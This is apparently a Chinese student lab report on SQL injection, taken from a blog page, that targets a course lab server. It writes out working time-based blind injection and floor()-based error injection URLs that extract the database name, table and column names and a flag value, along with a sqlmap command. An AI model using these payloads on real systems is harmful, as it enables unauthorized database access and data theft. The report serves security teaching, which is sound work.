SQL注入漏洞的攻击与防御
一、实验名称
SQL注入漏洞的攻击与防御
二、实验环境(详细说明运行的系统、平台及代码等)
1、攻击机系统环境:Windows 7/8/10
2、浏览器:Firefox 53.0.2(64位)
3、浏览器插件HackBar 1.6.3.1
4、Burp Suite 1.7.11
三、实验步骤及结果
1、基于时间延迟的盲注
打开Firefox浏览器,按F12,打开FireBug。选择“网络选项卡”
实验网址: http://222.18.158.243:4609/
注入点:http://222.18.158.243:4609/?id=1
需要学生自己构造SQL语句,获得字段个数、字段精确位置、数据库名、数据库用户名、表名、字段名、字段内容等信息。
提示:
http://222.18.158.243:4609/?id=1 and if(length(database())=6,sleep(1),1)%23
FireBug中,“网络选项卡”的时间线与
http://222.18.158.243:4609/?id=1andif(length(database())=5,sleep(1),1)%23
http://222.18.158.243:4609/?id=1andif(length(database())=7,sleep(1),1)%23
有明显区别,可以判断出数据库名长度为6
或者,做一个1,2,3,4。。。。30的密码字典,用Burp Suite爆破,注意,在显示爆破结果页面时,Columns列需要设置勾选“Response received”
Burp Suite使用方法参考:
http://www.360doc.com/content/16/0425/10/29967943_553593234.shtml
可以看到6与其他的明显不同,也可以得到数据库长度为6
2、利用floor()函数进行报错注入
提示“floor报错注入,注入点id=1”
实验网址: http://222.18.158.243:4606/
注入点:http://222.18.158.243:4606/?id=1
需要学生自己构造SQL语句,获得字段个数、字段精确位置、数据库名、数据库用户名、表名、字段名、字段内容等信息。
http://222.18.158.243:4606/?id=1 and(select 1 from(select count(*),concat((select database()),floor(rand(0)*2))x from information_schema.tables group by x)a)
http://222.18.158.243:4606/?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
http://222.18.158.243:4606/?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=flag LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
http://222.18.158.243:4606/?id=1 and(select 1 from(select count(*),concat((select flag from flag),floor(rand(0)*2))x from information_schema.tables group by x)a)
- 实验心得
通过实验了解基于时间延迟的盲注、利用floor()函数进行报错注入的相关操作
- 思考题
应该如何使用SQLmap进行本实验中的几个注入?
python sqlmap.py -u "http://222.18.158.243:4610/?id=1" -p "id" --current-db --batch -T "flag" --no-cast --level 5 --risk 2
SQL注入漏洞的攻击与防御相关推荐
- mysql延迟注入br,实验3—SQL注入漏洞的攻击与防御(基于时间延迟的盲注)
1.实验名称 SQL报错注入 2.实验环境 1.攻击机系统环境:Windows 7/8/10 2.浏览器:Firefox 53.0.2(64位) 3.浏览器插件HackBar 1.6.3.1 3.实验 ...
- web基础漏洞之SQL注入漏洞
先看菜鸟教程中HTTP的知识,HTTP是为了保证客户端与服务器之间的通信.HTTP的请求方法有两种:GET和POST.GET是从服务器上获得数据,POST是向服务器传递数据. Web 程序三层架构: ...
- sql注入漏洞,应屏蔽SQL注入攻击
2019独角兽企业重金招聘Python工程师标准>>> 注:SQL注入好比是前端URL传参数请求时参数以SQL 做为参数传入,如 select 1 from dual where ...
- [网络安全提高篇] 一〇四.网络渗透靶场Oracle+phpStudy本地搭建万字详解(SQL注入、XSS攻击、文件上传漏洞)
当您阅读到该篇文章时,作者已经将"网络安全自学篇"设置成了收费专栏,首先说声抱歉.感谢这一年来大家的阅读和陪伴,这100篇安全文章记录了自己从菜鸡到菜鸟的成长史,该部分知识也花了很 ...
- SQL 注入漏洞(十四)xff 注入攻击
一.xff 注入攻击 X-Forwarded-For 简称 XFF 头,它代表了客户端的真实 IP,通过修改他的值就可以伪造客户端 IP.XFF 并不受 gpc 影响,而且开发 人员很容易忽略这个 X ...
- php post防止hash攻击,MyBB editpost.php脚本'posthash' 参数SQL注入漏洞
发布日期:2012-12-14 更新日期:2012-12-18 受影响系统: MyBB MyBB 1.x 描述: ------------------------------------------- ...
- WEB安全:XSS漏洞与SQL注入漏洞介绍及解决方案
对web安全方面的知识非常薄弱,这篇文章把Xss跨站攻击和sql注入的相关知识整理了下,希望大家多多提意见. 对于防止sql注入发生,我只用过简单拼接字符串的注入及参数化查询,可以说没什么好经验,为避 ...
- 解决SQL注入与XSS攻击
最近接手之前同事的几个项目,公司利用扫描工具进行全项目扫描,发现了部分项目代码存在安全漏洞,所以需要进行项目代码修复以避免有人恶意攻击.这个任务自然而然的就落到我手上.在这里记录一下操作的过程. 扫描 ...
- SQL注入漏洞入门(操作实现)
一 Sql-Inject的概述 SQL注入(SQLi)是一种注入攻击,,可以执行恶意SQL语句.它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制Web应用程序后面的数据库服务器.攻击者可以使 ...
最新文章
- 2014 年美国程序员薪资调查
- redis设置键的生存时间或过期时间
- windows下配置tensorflow
- 本地随机图床api源码
- 80 个例子,彻底掌握Python日期时间处理
- JAVA定时器ScheduledExecutorService中,scheduleAtFixedRate和scheduleWithFixedDelay的区别
- ps里面怎么插入流程图_流程图很难画?学会这3个方法,5分钟能绘制出好看又高级的流程图...
- 为什么道理都懂,课执行力差的现象如此普遍?
- value数字 vue_Vue数字输入框组件使用方法详解
- 安卓开发 多语言strings.xml转excel表格,excel转strings.xml, excel转json (ExcelConversion)
- 百度杀毒软件2013低调发布 仅面向泰国市场推出
- typora下载百度网盘
- 队列DID:以知识青年“上山下乡”为例
- web前端网页制作思路(只是思路)
- 高数篇:02费马定理
- ipad android开迅视频播放器,迅课视频播放器
- Flexbox 基础知识
- Lombok 之 Log
- 电脑连接上WiFi但是上不了网
- 惠普HP DeskJet Ink Advantage Ultra 4729 驱动
热门文章
- puzzle(0912)智慧推动、推木头、方块识途
- 统计书中单词出现次数, 然后把数据生成pdf
- 英特尔Mooly Eden:力压Jeff Bezos的《财富》科技创想家
- SAP审计科目余额表和序时账差异原因分析实例
- 文件上传一句话木马,用菜刀进行连接
- 网易“点睛精准营销广告(文中广告)”可能的技术有那些
- 微型计算机usb只能连接u盘,USB接口连接的外部设备(如移动硬盘、U盘等)必须另外供应电源...
- 对校招生培养工作的建议_你对学校招生工作有何意见和建议?
- 计算机组装静电的危害,浅谈组装电脑如何防静电与去除机箱静电的方法-DIY装机...
- android物联网开发简书,Arduino物联网开发实例教程